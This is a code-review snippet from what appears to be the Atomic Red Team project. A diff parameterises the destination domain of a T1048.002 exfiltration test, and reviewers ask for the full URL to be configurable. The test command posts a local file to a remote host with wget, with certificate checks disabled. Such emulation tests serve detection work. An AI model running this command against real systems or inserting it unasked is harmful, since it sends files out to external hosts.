atomics/T1048.002/T1048.002.yaml

```diff
@@ -67,19 +67,28 @@ atomic_tests:
       description: Test data to upload
       type: path
       default: PathToAtomicsFolder/T1048.002/src/artifact
+    endpoint_domain:
+      description: Endpoint to send data to
+      type: string
+      default: example.com
   executor:
     name: sh
     elevation_required: false
     command: |
-      wget --post-file="#{input_file}" --timeout=5 --no-check-certificate https://example.com/ --delete-after
+      wget --post-file="#{input_file}" --timeout=5 --no-check-certificate https://#{endpoint_domain}/ --delete-after
```

Comment:
@alphonsa-01 Can you modify the input_argument to have the entire URL ? This way, we can accept http urls too

Reply:
Same for the other change as well